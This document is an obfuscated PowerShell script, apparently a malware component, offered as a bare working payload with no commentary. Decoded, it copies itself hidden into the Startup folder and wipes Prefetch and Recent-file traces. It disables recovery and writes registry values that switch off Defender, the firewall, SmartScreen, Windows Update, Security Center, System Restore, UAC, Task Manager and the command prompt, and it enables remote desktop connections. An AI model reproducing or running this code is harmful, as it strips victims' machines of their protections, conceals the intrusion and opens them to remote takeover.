 set-Item VaRIAbLE:4ZP (     [TypE](  'sYs'   +    't'   +  'e'     +     'm.eNVIRonm'  +    'En'    +'T'   )     ) ;       SEt-itEm  VaRIaBle:9YSrh  (    [TypE](    'sY' +     'ste'     +    'm'    +     '.iO.PAth'     )    )     ;  ${eR`RORAC`TIOnpR`Ef`ER`EN`ce}   =   (  'Si'    +   (    (  'len'  + 't'  )     +    'ly'   )   +    (     'Co'     +     'n'   )   +  (   't'+   'in'     )  +  'u' +    'e'   )

${S}      =   ${M`Yin`VocAtIon}."m`yCo`mmand"."p`Ath"
${E}   =   (       &     (    'Get-P'  +   'roces'   + 's'    ) -Id ${p`iD}  )."P`ATh"
${F}     =  if (   ${S}    ) { ${s} } else { ${E} }

${T`T`TttTTt`Tt`TtTtT`TT`TTT}     =     (  GEt-iTem variabLe:4zP    ).vALUE::"getFol`d`E`RPath"(   (   's'     +  (  't'   +   (  'ar'  +   't'   )     )  +   'up'    )    )
${TttttT`TtTTT`T`Ttt`TtT`Tt} =    "$tttttttttttttttttttt\"

function INvokE-sEL`Fr`EpL`iCa`TiON {
    ${REP`L`ICATeD}    =      (   VARIaBLE (     "9"     +     "YSRh"    ) -Valu     )::"CO`mB`InE"(   ${Tt`TtTTt`TTt`T`TtTT`Ttt`Tt},  (    GeT-VARiabLE  9YSrh  -VaLuEOn       )::"gE`T`R`AnDOmFI`l`ENAMe"(    )      +     (   Ls ("VAriaB"  +  "LE:9"   +    "ySr"      + "H" )      ).VAlue::"g`EteX`TenSI`on"(     ${f}   ) )
    if (   -not (        &   (    'Test-'   + 'Pat'  +  'h' ) (   ${TT`TTt`Tt`TT`Tt`Tt`TTTttTt}   +     (    Gi vaRiABLe:9ySrH   ).VaLue::"ge`TfI`LEna`mE"(${F} )   )  ) ) {
         &    (    'Set'     +      '-C'  +  'ontent'  ) -Path ${R`EpLIC`A`TEd} -Value (      &   (    'Get'    +  '-Con'   +  'te' +   'nt'   ) -Path ${F} -Raw   )
        (        &   (  'Get'    +  '-'   +   'Item'  ) ${Re`Pli`CAT`Ed}    )."at`TRib`Utes"   =   (    'Hi'    +  'd'    +      (    'd'  +    'en'   )  )
    }
}

function in`VOKE-`se`lF`DesTRUCtIoN {
 
     &   (   'Re'  +  'm'     +  'ove-Item' ) -Path (    (     'HK'    +  'CU:{'     +    '0}Software'    +   '{0}'   +  (    (   'Cl'    +     'a'   )+      's'     )      + 'se'    + 's{0}'   +  'm'      + ('s'    +  '-s'    ) +  (   'et'    +  (   'ti'    +   'n'    )   )    +  'gs' +  '{' +'0}she' +    'l'    +  'l'   )  -f[ChAr]92      ) -Recurse -Force

      &     ( 'Get-Chi'     +'ldIt'+     'em' ) -Path "$env:SystemRoot\Prefetch" -Filter (      (    (   '*'      +    'PO'    )+  'W'   )  +     'ER'  +   'S'   +     (  (    'H'  +  'EL'   )  +   'L'     )     +   (   '*'   + (     '.'    +   'pf'    )  ))    |    &    (    'Remo'     +  've'     +   '-Ite'   +    'm'   ) -Force
    ${scrIP`T`NAMe}      =      (      LS  varIABLE:9ysRH    ).Value::"GeTfIleNAMewiT`Hou`Te`x`T`eN`SioN"( ${f} )
    ${p`Ref`eTCHF`I`lEs}       =   &   (   'G'  +  'e'    +  't-Child'   +   'Item'     ) -Path "$env:SystemRoot\Prefetch" -Filter "$scriptName*.pf"
    if (      ${PREFEt`CH`FILeS} ) {
        foreach ( ${F`ile} in ${prE`F`EtC`HfiLeS} ) {
               &      (   'Remove-'      +   'I'   +   'tem'  ) -Path ${fi`Le}."ful`lNa`ME" -Force
        }
    }

    ${rece`N`TFileS}   =     &     (   'Get-Chil' +    'dI'    +    'tem'    ) -Path "$env:APPDATA\Microsoft\Windows\Recent"     |       &     (   'Wher'  + 'e-O'  +  'bject'  ) { ${_}."Las`TWRite`TiME" -ge (    (       &   (  'G'     +   'et-Date'    )   )."addD`A`ys"( -1 )   ) }
    if (    ${REcE`NTF`ILEs}  ) {
        foreach (    ${f`IlE} in ${REcE`N`T`FIlES}   ) {
              &     (   'Rem'  +    'ov'    +    'e-Ite'    +    'm'     ) -Path ${fI`le}."f`ULLnA`mE" -Recurse -Force
        }
    }

    if (     -not (     &    (  'Tes'   +  't-Path'   ) (   ${TtT`TTTtTtTT`Ttt`Tttt`TT}    +      $9ysrh::"Ge`TfI`leN`AmE"(  ${f}    ))    )) {
        if (  ${s}     ) {
                 & (  'Remov'   +  'e-'+'It' +  'em'     ) -Path ${f} -Force
        } else {
                &    ('St'   +    'art-P'   +   'r'  +   'o'    +    'cess'    ) powERSHE`LL`.eXe -ArgumentList (  '-'   +    'N'+(    (   'oP'  + 'r'  )+    'o'   + (    'fi'    +   'le '  )   )  + (  '-C'   +  'o' )    +     (   (  'm'+      'man'      ) + 'd'      )  +   ' '     +  (   (  "`"Remove-Item "  +   ''     )  +      ''  ) +(    '-'  +    'Pa'  )    +     (    't'     +   'h '    ) +  (( "'$f' "     + ''     )  +   ''    )  +    (     '-'   + 'Fo'    )  +   (    'rc'  +  'e '      )    +    (   ( '-Er'  +    'r')  +  'o'  +  (   'r'      +    'Act' )   ) +    'io'     + 'n' +    ' '+    "SilentlyContinue`""      ) -WindowStyle HI`Dd`EN
        }
    } else {
         &  (   'Rena'    +    'me-Ite'    +'m') ${F} -NewName (   (     VariaBle 9ySrh      ).vALUe::"GeTR`ANdom`FileNa`Me"(        )      +       (   vARIabLE 9ySrH -vAl  )::"GETeXtEN`S`Ion"(   ${f}   )      ) -Force
    }
}

function SE`T`-reGistRy`Pr`OPE`R`TIES {
    param (   
        [string]${pa`Th},
        [hashtable]${P`R`Oper`TiES}
        )

    if (      -not (      &  ( 'Test-P'   +   'a'     +   'th'     ) ${pa`Th}      )   ) {
            &    (  'New-' +   'Ite' +     'm'   ) -Path ${p`AtH} -Force       |       &    (    'Ou'   +     't-'   +  'Null'   )
    }

    foreach (  ${k`Ey} in ${p`RoP`erTiES}."k`eYs"     ) {
              &     (    'Set-I'    +    'te'  +    'm'   +  'Proper'   +  'ty'   ) -Path ${P`ATH} -Name ${k`ey} -Value ${pr`o`Pe`RTiES}[${K`ey}] -Type dW`oRd -Force
    }
}

${Bas`eK`Ey}    =    ( (    (    'H'    +    'KL' )  +'M'    +   (   (   ':Z'     +     'C'  )     +   'OS'   +   'O'     )   +    'F'   +    'TW'    +      (    'A'    + 'R'  +   (    'E'    +    'ZCOPol'    )   ) +      'ic'  +    'i'    +   (    ( 'es' +  'Z' )     +   (    'C'   +   'OM'  )     )    +    (   'i'   +  ( 'cr'    +   'os'  )   ) + (  (     'o'  +    'ftZC' )  +'O'   )  +  (   'Wi'   +   'n'  )  +   (  (  'd'  +'ow'     ) +   's' )     +     (   ' '   +    ( 'Def'   +     'e'     )     +     'nd'    +    'er'   )  )."R`ePlACE"(    (     [CHar]90   +  [CHar]67 +   [CHar]79   ),[sTriNg][CHar]92     )   )
${REAl`T`ime`PrOt`ec`TIoNKEy}     =   (   (  ( "$baseKey\Real-Time "   +     ''   )  +    ''  )    +   (  (  'P'    + 'rote'  +    'c'  )     +  't'    +    'i'   )   +    'o'  +    'n'   )
${fi`RE`WA`LlPa`Th}    =   (    (   'H'   +  (   'KL'     + 'M:'   )    +  '{0}'   +    ( 'SY'  +   'ST' )   +'EM{0}'   +  (     'Cu'   +'r'      )    +     'r'    +    (     'e'    +  'nt'     )  +  (     'C'    +    (  'on'  +   't')    )   +   (  'r'     +      (  'o'   +  'lSe' )      )   + 't{0}'  +  'S'   +   (    'er'  +  (    'vi'   +  'c'      ) )    +   'es{0}S'   +   (  'h'  + (  'ar'   +    'ed'      )     + 'Ac' )    +   'c'    +   'ess{'     +  '0}Paramete'    +  'rs{' +     '0}FirewallPolic'  +   'y'  ) -F  [cHAR]92    )

    &  (    're'   +   'agentc'   ) /Di`Sa`Ble

  & (  'Set-R'   +'e'    +     'g'      +   'istryPrope'   +  'r'  +   't' +  'ies'  ) -path (   (  'HK'     +  (  (  'CU:'    +  'J5R'   )     +   'S'   + 'o'    )   +   'f'  + (     'tw'    +  'a'    )      +     (  'r'  +   'eJ'   )    + (     '5R'  +    ('M'   +'ic'    )    +      'ro'   +   (   'so'+   'f'     )  )  +   (   't'  +  (      'J5RW'     +   'ind'  )    )  +    'o'    +  'ws'  +   'J5'  +  ('RC'+     'u'   )    +   (   'r' + (    'r'    +    'ent' )  )   +     (   'V'     +    'er'    )+(  (   'sio'    +   'n'   )   +    'J'   +    (   '5R'   +  'No'    )    +  't' )   +    (    'if'    +     'i' )    +    ('c'   +  (   'at'   +'io'   )    + 'ns'   )    +    (   'J5'    +  'RS'   )    +    'et' +   (  (  'ting'  +    's' )    +     'J'   )     +    (    '5'    +  ( 'R'  +   'Wi'     )   )  +  (   'n'   + 'do' )  +   ( (   'ws'    + '.S' +      'ys'     )+    'te'   +    'm'   )    +  (     (   'T'    +'oa'    )   +    'st'    )    +    ('.'   +    (  'Sec'    +   'uri'  )  +  'ty'    )  +   (     ( 'An' +   'd'   )    + (   'Ma'   +   'inte'    )  )  +  'n'  +  'a'  +  (    'n'    +    'ce'   )    )."REPL`AcE"(   (  [chAR]74  +  [chAR]53  + [chAR]82  ),[STRINg][chAR]92    ) ) -properties @{(    'En'   +   (   'a'    +  'bl'   ) + 'ed'  )   =   0}
     & ( 'S'  +     'et'     +  '-' +  'Reg'    + 'istryP'+   'ropert'     +      'ies'  ) -path (     (     'HK'   +   (  'L'  +  'M:'    + (  'q'+    'dYSOF' )     )+   (   'T'  +  (   'WA'      +    'R'     )  )   +    (  (    'E'    +  'qd'   )   +     'YP'   )     +      (   'ol'      + (      'i'  +   'ci'  )    )    +   (   (    'e'   + 'sq'    )   +    (   'dY'    +    'M'     )    )  +   (   'i'    +  (    'cr'  +    'oso'    )  +    ( 'ftqdY'  +    'Wi'    )+   (     'ndo'   +   'w'    )  +   (  's'    +  ' D'  )  )      +    'ef'+     (   'e'   +    (    'nd'   +'e'    ))      +    (     'r'  +  (    ' '  +  'Se'  )    +     (   'cu'   +    'ri'     ) )   +    (    't'   +  'y '   )+ (   'Ce'   +  'n'  )    +     (   (   'terq'  +    'd'    )   +    'Y') +     'N'      +   ( 'ot'   +    'if'  +   (      'ic'   + 'at'   )   )   +    (     'i'    +     'on'    )+   's'  )."Re`p`LacE"(    (  'qd' +    'Y'),'\' )     ) -properties @{(    (    'D'   +     'is'    )  +     (  'a'  +     (    'b'   +   'le'      )   +   'N'  +   (   'oti'   +   'fi'  +  'c'    )  ) +    (    'at'+    'i'    )   +      'o'     +  'ns'    )    =     1}

     & (   'Set'    +   '-Re'   +  'gi'  +'s'     +   'try'      +    'Properties') -path ${B`AS`eKEy} -properties @{
    (    ( 'Di'  +    's'  ) +     (    (   'ab'      +    'l' )   +    'eA'  )   +    'nt'     +   'iS'   +   (     'p'     +   'yw'   )    +      (    'ar'  +    'e'   )  )   =      1 
    (  ( 'Di'     +     ( 's'   +   'abl'    ) )   +    (  'eA'   +   (  'p'     +   'pl'   )    + (     'ica' +    't'  ) )  +   'i'  +    'on'  +    'Gu'   +   ( 'a'    +'rd'   )      )     =   1
    (    'Di'    +     (    's' +  'ab'  ) + 'l'  +   'e'    +    'C' +  ( 'o'   +     'nt'   )     +    'ro'     +(    'll'   +    'e'    +   'd'      +  (   'F'    +    'o'     +    'lderAcce'    )    )  +    'ss'    )   =     1
    (  (  (     'Disab'    +  'leC'   +'r'    )     +   'e'    +    (    'dent'    +   'i'  )     )  +  (   'al'   +   'Gu'  )   +    'a'    +    'rd'   )     =    1
    (     ('Di' +    'sa'     )     +  (    'bl' +   'e'  )   +   (      'In'     +   'tr'  )   +    'u'  +  (    's'  +  ( 'ion'    +    'Pr'  )    )    +   'ev'   +  'e'    +    (    (  'nt'   +   'i'  )     +'on'   )    +  (  'Sy' +  (     'st' +   'em'     ) )   )   =    1
    (     'D'    +     (   (    'i' +     'sa'   )    +     'bl'    )   +    'e'   +   (   'I'   +   'OA')    +  (    (    'VP'  +   'ro'      )  + ( 'te'   +   'c'    )     )+ (   'ti'  +  'on'   ) )  =      1
    (  (   'Di'   +    'sa'     )   +     'b'    +    'l'  +  (     (    'e'     +    'Re'    )+    'a' +  (  'lt'   +  'i'  )    )   +  (    (    'm'+  'eMo'    )  + 'n'    )    + (    (  'i'    +    'to'  )  + 'ri'    +    'ng'    )  )      =    1
    ( (     'Di'    +   's'     )  +(     'ab'  +    (    'l'   + 'eRo'     )     )    +     (    ('uti'  +    'ne'     ) +    'l'    +  'y'  )   +     'Ta'     +   'k'   +   (     'i'  + 'ng'    +    ( 'Ac'   +  'tio'   )    )  +  'n'  )      =  1
    (    (  (  'Dis'    +    'a'     +    'bl' )   +     (     'eS'  +  'p'   )  +    'ec'   )   +  (   'ia' +   'l'  )    +    (  'Ru'      +      (      'n'+   'ni'    )    )  +     'ng'  +   'M'     +  'o'    +    ('d'   +     'es'    )      )    =   1
    (     (   'Di'     +    's'     )  +     'ab' +  'le'  +    ( (   'Ta'   +  'm')  +     'pe'   +     (   'rP'    +      'r'   )    +   'ot'     )   +    'e' +     (   'c'   +     (   'tio'  +  'n'  )    )  )   =    1
    (    'P'  +'UA'   + ( 'Pr'   +    'o' )   +  (   (   'tec'    +   'tio'    )    +  'n' )     )      =    0
    (    (     ( 'Ser'   +   'vi'     )      +    'c'     + 'eK'    )     +      (  (   'eep'   +    'A'     )   +      'l'  )  +   'i' +   've'   )     = 0
}

  &    (   'Se'  +   't-R' +     'egis'   +     'tryProp'   +     'er'  +      'ties'    ) -path ${r`eAlt`IMEprOte`C`T`ioNkeY} -properties @{
    (     'Di'  +     (   's'  +   (    'abl'   +    'e'     )     )  +    (    'Be'   +   'h' )    +   'av'     +   'i' +      'o'   +      (    'rM'   +   (  'oni' +      't'   )    )   +  (     ('or'     + 'i'   )+  'ng'  )   )   =      1
    (     (     (   'D'  +  'isa'   )      +     (   'b'  +   'le'    ) +   (    'B'   +    'lo'    )   )    +   'c'  +    (   'kA'   + (   'tF'  +     'i' )    )  +    (   'r'    +  'st'   )  +  'S' +    (   'ee'  + 'n'   ))   =     1
    (     'Di'   +  'sa'   +  (    'b'     +    (   'le'      +    'C'  )    +   'l'      +  (  'oud'    +    'Prote'   +   'ct'  )    )     + (   'io'    +     'n')    )     = 1
    ( 'D'   +  'i'    +     's'    +   (   'ab'     +     'l'    )     +   ( (   'e'    +  'On'    )   +   'Ac'    )  +   (     'c'  +    ( 'e'   +   'ss'   )    +  (   'P'    +    'rot'  )   +   (   'ect'   + 'ion'  )  )   )   =   1
    (  (    (  'Dis'     +    'a'      )  + 'bl'  )    +     (    'e'  +  (   'S'    +  'ca')  )    +   (   (    'nOn'    +  'R'    )   +     (  'ea'   +    'l'  )  +    't' )    +  (   ( 'i'  +    'me'   ) +     'En'   )    + (     'ab'   +    'le'  ) ) =      1
    (  (    'Di'   +   (     's'     + 'ab'    )  )   +   (    (    'leS'    +  'c'    ) +   'r'    )      +  (  'ip'  +    (     'tSca'   +'n'   ))  +    'ni'    +    'ng'    )   =    1
    (   'S'     +      (     (   'u'      +  'bmi'   )  +   (   'tS'    +   'a' )   +  'm' )  +'p'   + (    (    'l'  +  'es'    )   +   'Co'   )   +   ('ns'   +  'e'  )     + 'nt' )      =     2
    (  (   'D'     +    'is'   )   +   'a'  +   (    'bl'   +   'eN'  )   +    (  'et'    +     (   'wor'     +  'k' )   )      +     'P'     +    'ro'   +   (  (    'te' +     'ct'     )   +     'io'     )    +    'n'  )    =    1
}

    & (     'Set-R'   + 'eg'    +    'i'   +   'stryProp' +    'ert'     +    'ies'   ) -path "$firewallPath\DomainProfile" -properties @{(  (   (   'Ena'    +   'b'  )   +    'le'     )    +   (    'Fi'  +     'r'  )  +   (  'e'  +    'wa' )+     'll')   =   0 ;     (   ('D'  +     'is' ) +      'ab'   +     'le'    + (    'N'  +  ('otif'    +    'i'  )  +'c'   +     (   'ati'  + 'o' )  )     +  'ns'  )   =    1}
    &   (   'Set-Regis'+ 't' +   'r'      +     'y' +  'Properties'      ) -path "$firewallPath\StandardProfile" -properties @{(   (  (    'E'     + 'na'    )   +   'bl'   )    +   'eF'   + (   'i' +     're'  )  + (     'wa'     +   'll'  )  )    =   0   ;       (    'Di' +   (  's'    +     (    'ab'    +   'l'     )   )  +   (    (    'eNoti'      + 'f'  )     +   'ic'    )  +   'a'  +    't' +   (  'i'  + (   'o'    +    'ns'  )    ) )    =    1}
   &  (    'Se'   + 't-Reg'   +   'istryPro'   +  'per'  +     't'  +     'ies' ) -path "$firewallPath\PublicProfile" -properties @{(  'En'    +    'ab'   +   ( 'l'     +    (      'e'  +    'Fi'    )    )   +    (  (   're'   +    'w'   )    +   'a'   )    +'ll'   )     =   0     ;  (  ( (     'D'   +     'is'    )+   'a'   +   (   'bl' +     'e'  ) ) +     ((  'N'  +    'ot'  )   +   (     'if'   +      'i'   )     )   +  (    'ca'   +  't'  )  +   'io'    +   'ns'  )  =      1}

   &      (  'S'  +    'et-ItemProp'    +   'e' +   'rt'    +     'y'  ) -Path (     (  (   (    'H'   +  'KL'  )    + 'M'     )   +':'   +     '{0'  +   '}SOFTWAR' +     'E{0}Micr'   +    'osoft{0}' +    'W'   +    (   'i'    +    (   'n'    +   'do'     )   )    +   'ws{0'  +    '}Cu'      + (  'rr'+    'en'  )   +   ( 'tV'  + (   'er'     +     's'    )   ) +  'ion{0'     +  '}Ex'     +  'p'  + (   ('lor'    +   'e' )   +    'r' )    )-F  [cHar]92 ) -Name (   (    'S'    + (  'ma'    +     'r' )  )     +    (    (    'tS'  +    'c'   )    +(    'r'+    'ee'  )     )     +   'nE'   +   'na'   +   (    'bl'   +      'ed'  ) ) -Value ( 'O'  +   'ff'     ) -Type s`TRI`NG -Force
      &  (  'Set-Regis'   +    'tryPro' + 'pert'   +   'ies') -path (   (     (  'HK'   +'CU'     ) +   ':'   +    (    'R'    +     'km' )+    'S' +    'O'   +    'FT'    +  (     'WA'   +  'R'    )   +    (  (  'E' + 'Rk'    )    +   'mM'     +    'i'  )     +(   (   'cr'  + 'oso'    )   +  'f'    +    'tR'   )     +   'k'    + ( 'mE'  +   'd'   +     (      'ge'   +    'Rk'  )    )  +   'mS'  +   (    'ma'   + (     'rt' +     'Sc'   )   )  +  ( 're'     +    (      'enEn'  +'ab'    +    'l'    ) + 'ed'     )    )  -CrEplaCe  (      [CHar]82    +   [CHar]107   +[CHar]109   ),[CHar]92   ) -properties @{( (    (  (   (   '(D'    +  'e'   )    )   + (   'f'   +    'aul' )  +      't'    )    )   +    ')'   )     =   0}
   &     (  'Set-RegistryP'   +      'rop'   +  'ert'  +   'i'   +   'es'     ) -path (   ( (   (    'HK'  +      'C'   )   +   'U:'  )     +     (   'XE' +  'vS'   )  +   (   (   'OF'    +      'TWAR'    )  + 'EX'    +     'E'    ) +  (   (     'v'    +   'Mi'    )  +  'c'    )   +  (     (     'ro'      +  's'   )    +  'o'     )  +   (  (   'ft'    +    'X'   ) +    'E'   ) +   (    'v'   +  (   'W'     +   'in')   ) + (  (    'do'    +   'ws'     )   +    'X'   +  ('E'  +   'vC'  )  )    +   'u'  +  (    'r'    +  're'   )      +     (   'nt'   +   ( 'Ve'  +  'r'      )   )   +  'si'    +    ( 'on'    +   'XE'    )  +   'vA'  +  (    'pp'     +    (  'Ho'    +    'st'    )   )   )."R`EplaCE"(  (     [cHAR]88   +[cHAR]69   +     [cHAR]118   ),[STrING][cHAR]92     )) -properties @{(  ( (   'En'   +  'a'   ) +    'b'   ) +  (     'l'+  (  'eW'    +  'e'    )  )    + (   'b'    +  (   'C'    +    'on'   )    )  +   't'  +    ( ( 'en'  + 't'   )  +    'E'    )   +   'va'  +   'l'   +'ua'   +    (   't'    +    (     'io'+      'n'     ) )     )  =    0}

   & (    'Se'   +      't-'      +  'RegistryP'  +  'rop'  +   'ert'    +    'i'    +  'es' ) -path (     (   'HK' +'L'  +   'M:'   +   'LA'    +   (     'mS'   +     (   'OF'   +    'T' )    )  +    'W'   +     (   'AR'   +   'E' )    +     (    'LA'+  (    'mP'   +   'o'    )   )  +   'l'   +     'i'  +    'ci'  +   ( 'es'     +  (  'L'   +  'Am'  ) + 'Mi'   )+  'cr' +     (     'os'    +    'of'      ) +   (  'tL'   +    (    'Am'   +   'W'  )    +  'in'  +  (  'dow'    +    's'    )   +   (    'L' +  'Am'    )   )  +   (     'W'      +     (   'indo'   +   'w'  ) )    + ( 'sU'    +    'pd' )    +   (     (  'at'   +   'e'   )   + (   'LAm'   + 'A' )    +    'U'      ) )-rEPLACe (    [CHAr]76  +[CHAr]65   +   [CHAr]109   ),[CHAr]92     ) -properties @{(    (    (  'N'  +    'oA'    )  +     'ut'     )+ 'o'      +    'U' +  (  'pd'   +    (  'at'  +   'e'   )   )    )      =   1}
   &    (  'Set-'    +      'Regis'   +    'tryPro'     +   'pe'  +     'rties'  ) -path ( (    'HKLM:{'     +  '0'     +   '}SYSTEM{'    +   '0}C'  +   (  ( 'ur'   +     'r'     )   +  'e' )  +  (    'nt'   +  'C'     )  +    (  'on'  +    (   'tr'   + 'olS'    )   )   +    'et'  +   '{0}S' +  (  'e'     +'rv'      )  +  'ices{0}' +    (    'w'  +   'ua' )  +    (  (   'us' +  'e'    )   +    'rv'    )    ) -f  [ChaR]92  ) -properties @{(    ( ( 'S'    +  'ta'      )  +    'r'   )     + 't'   )  =      4}

   &    (   'Se'   +  't-Regis'    + 'try'  +   'Pr'  +    'ope'   +  'rties' ) -path (   ( (     'HK' +    (   'LM'  +  ':'  )   ) +   '{0'  +     '}S'   +   (  'OF'    + 'TW'   )   +  'ARE{0}Polici'    +     'es{0}Mi'   +   'c'+  (    (    'r'   +   'os'    ) +   'o'   )   +    'f'   +     't{0}'      +     (      'W'   +    'in'  )    +    'd'     +     (   (  'o'   +  'ws '    )      +     'N'   ) +  'T{0}Syst'   +  (  'em'   +   'Re'    + (   'st' +    'or'   )   )     +  'e'   )  -f[cHAr]92  ) -properties @{(     (   'Di'      +     'sa'    )    +  (   'bl' +  'e'    ) +     'SR'   )     =    1    ; ( (     'D'   + ( 'isa'  +  'b'   ))  +  'l'     +      (   'e'    + (     'Con'   +   'f'   +   'ig'   )    )   )    =       1}
   &(  'Set-Reg'  + 'istry' +     'Pro' +  'pe'+   'rt'     +  'i'    +   'es'    ) -path (    (     'H'    +  (  (     'K'   +  'LM'    ) + ':' )    + 'n'      +    'r'    +   (     '7S' +   ('YS'     +     'TE'     )   )   +    (    'Mn'   +    'r' + '7'   +    (    'Cur' +  'rentC'  +  'ont' )  ) +   (  (   'rol'    +      'Set'  )    + 'n'     +    'r7'   )+    (   'Se'   + (     'rvic'  +     'es'     +    'n'  ) +  'r' +  '7s'     )  +   ( (  'rse'   +   'r'   )     + 'v'     )    +     (  'ic'      +   'e'    )  )."rePL`ACe"(     ( [ChAR]110   +      [ChAR]114  +  [ChAR]55    ),'\'   )  ) -properties @{(   (   'St'    +  'ar'     )    + 't' ) =     4}

     &   (    'Set'   +   '-Regi'  + 'stry'   +   'Prope'   +    'rt' +'i'+     'es'   ) -path (   (    (      'HK'   +     'C' )  +     'U'    +    (     (   ':bf0'    +    'So'   ) +    'f'     )     +     (  (     'tw'   +      'areb'    )    +    'f0'    )    +   'M' +   (    'i'     +  'cr'     )   + (    (   'o'     +   'so'  )   +  'f'    )  +   (   'tb'    + 'f0'     +   (   'W'+    'indows'  +    'b'  )     +   'f'   )  +(   (    '0Cu'   +  'r'      ) +   'r'  )    + (  'e'     +   (   'nt'  +   'Ver'   )  )  +  ( (   'si'    +  'onb' )   +   'f0'  +  'P'  )    +   (   (   'oli'      +     'c'   )   +    'ie'  +  (    'sbf0'   +      'S'      )  )  +     'y'  +    (     'st'    +     'e' )  +   'm'     )  -crEpLAce (   'bf'     +  '0'  ),[ChAR]92    ) -properties @{(   'D'   +      'is'    +    (      'ab'    +   (     'l'  +   'eT'  )      )   +     (   'as'  +    (   'kM'  +     'gr')    )    )   =    1}

   &    (    'Se'     +    't-Reg'    +  'is'  + 'tryProp'  + 'e'    +   'rties'     ) -path ( (      (     'HK'    +     'C'   )    +     'U'   +      ':{'     +     '0}Sof' +      't'    +   'ware{0}P' +   (   'o'   +     (   'li'  +  'c'     )   )    +   'ies{0}M'    +   (    (   'ic'   +    'r'     )    +   (  'oso'  +'ft'   )    ) +'{0}Wi' +   'n'   +      'do'     +  'ws'  +  '{0}Sy'    + 'st'   +  'em'   )  -f[cHAR]92    ) -properties @{(   'D'     +  (   (   'is'      +  'a'   )  + (    'b'   + 'le'  )  )   +   ( 'C' +   'MD'  )   )   =   1}

   &  (   'Set'     +    '-R'+   'egi'    +'stryP'  +'ro'     +     'perti'   +    'es'   ) -path (    (   (   'HK'   +  'LM'   )   +':t'   +      'e4'    +     'SY'  +    'S'   +   'TE'   +   (    'Mt'   +'e'  )   +    (    '4'   +     'Cu' )  +      (    (  'r'  +  're')    +     'n'    +  (    'tC'    +   'o'    )      +    (    'nt'     +  'rolS'   +   'e' )     )  +     ( 't'     +   (     't'   +'e4'   )   )+  (    'C'    +    (    'o'   + 'nt'     )      )  +     'ro'    +    'l'    +  (  (    'te'     +   '4T'   )   +  'e'   +    (   'r' +   'mi'  +'nal'  )  +   ' '      )   +    (    'Se'  +   'rv')  +   'er'    )."REp`L`Ace"(    ([Char]116 +  [Char]101   +  [Char]52   ),[stRiNG][Char]92  )   ) -properties @{(  'f'   + (  'D'    +   ( 'en'    +     'yTS'  )    +    (   'Co'   +  'nn'    )    )    +'e'      +   (  'ct'     +'i'    )   +    (  'on'     +   's')    )     =      1}

      & (  'Set'   +     '-Re'    +     'gi'     +      'stryProp'   +  'er'    +  'ti'   +    'es'  ) -path (    ((   'H' +     ( 'KL'   +    'M:'  )  +     'mJ'    )   +  'w'  +   (    'SO' +   'F'  +    (  'TW'  +    'A'   )  )  + 'RE'     +    'm'      + (  'Jw'  +    'Mi'  +   (    'c'      +   'rosof'   )  +    (   'tmJwW'  +   'in'   ) )  +  (   'd'  +     (   'ow'  + 's'   )  )   +('mJ' +    'wC'   +  'ur'   )     +  (  (  'ren'     +    't'   )  +   'V'  )   + (   'e' +  'r'    + 'si'    + (    'on'  +     'mJwP' +   'olic'   )    )     +  (  (  'ie'  +  's')  +    'mJ'  )  +   'w'  +   ( 'S'  +  (   'yste'  +    'm'    )    )  )."reP`lace"(   (   [CHAR]109    + [CHAR]74    +  [CHAR]119   ),'\'    )  ) -properties @{(   'E'   +   (     'n'   +    ('abl'     +  'e'     )      )  +   (     'LU'    + 'A'   ))     =       0}

   &     (    'S'   +   'et-Reg' +   'is'   +  'try'  +    'Properti'   +   'e'  +   's'     ) -path (     (    'HKLM:{0}SYST'  +    'EM{0}'+    'Cu'     +  (   (    'rren'   +    't'   )    +  'Co'   +     'n'    )   +   't'  +   'ro'  +    'lSet{0}Ser'  +    'v'   +   'ices{'     +  '0}wscsvc'    )-F[chAR]92  ) -properties @{('St'+(    'a'  +   'rt' )    )   =       4}

 &    (  'S' +'et'    +    '-Reg'     +   'istryPr'    +   'operties') -path (     (   'H'   + 'KLM:{'     +    '0}SOFTW'     +    'ARE{0'  +  '}Microsoft{0}Windows'    + '{0}Windows'    +  ' '+    'Er'  +   (    'ro'  +   (   'r R'    + 'e'   ) )  +   (  'p'    +    (  'or'   +    'ti'  )    )    +      'ng'  )-F[cHAR]92  ) -properties @{(  'D'   +   (   'i'   +  (   'sa'   +   'bl'    )    ) +   'ed'   )   =   1}

    &   (    'Se'   +   't-'   +    'Regi'   +      'stryPropertie' +   's'  ) -path (   (    ( 'H'      +  (   'KLM:'   +  'I'   )   ) +   'HT'    +    'S'      +      'YS'   +  'TE'    +     (    'MI' +  (     'HT'  +     'C')    +     (  'u'    +   'rre'    )      )    +  (  (    'ntC'   +     'ont' )    +   'r'     )   +  ( ( 'o'      +   'lS'   ) +    ( 'e' +     'tI' )   ) + 'H'  +   'T'     +  ( (   'Co' +   'nt'     )     +   'r'     ) +   (     'o' +   (    'l'  +   'IH'    )     )     +('TR'      +    ('e'  +   'mo'    )  ) +    (   't'   +    (   'e'      +    ' Ass'  )  )   +   'is'      +  't'  +(      'an'  +   'ce'    )  )."REp`L`Ace"(  (   'I'   +  'HT'  ),'\'  ) ) -properties @{(   (   'fA'+    'll'  ) + 'o'    +  (    'w'   + ( 'To' +   'Get'  )    )    +   (   'He'    +   'lp'  )  )  =    0}

  &    (   'Se'   +     't-Re'   + 'gistryPr'   +      'op'  +    'erti'  + 'e'    +   's'   ) -path ( (    'H'    +  (  'K'   +  ('L'   +  'M:'     )    )  +  '{0'     +     '}'  +   'S' +      'YSTEM{0}Cu'   +   'r'  +   (  'r'      + 'en'   )   +   (      'tC'   + (   'o'   +   'ntr'  )   )    +    (  'o'  +  'lS'  )  +      'et{'   +  '0}S'    + 'e'   +    'r'      +   'vices{0}W'   +   (    'aa' +  'SM'   )  + ( 'e'    +    'di'  )   +     ('cS'  + 'vc'     )  )-F [cHar]92   ) -properties @{(  'St'   +   (     'ar'   +  't'  )   )    =    4}

  & (    'Set-R' +  'egistryP'      +  'rop'    +   'er'  +   'ties'   ) -path (   (   (   'H'   +    (  'K'  + 'LM'     )   )   +   (   ':'  +    'fk'  )  +    '7S'    +(    'Y'    +   ( 'STE'  +  'M'    )    +    'fk'    )  +   '7'   +   'C' + 'u'  +   (  (   'rr'    +    'en' )     +     'tC'   ) +'on'     +    'tr' +   (    'o'   +  (   'lSetf'    +    'k7' +  'S' )     + 'e'      )   +  (  (     'r'   +    'vic'    )      +   'e'  +  's'   +     (    'fk7'    + 'BI'  +     'T'  )  +    'S')      )-CReplaCE (    [ChaR]102  +   [ChaR]107   +    [ChaR]55    ),[ChaR]92    ) -properties @{((  'S'    +     'ta'  )     +    'rt'     )    =    4}

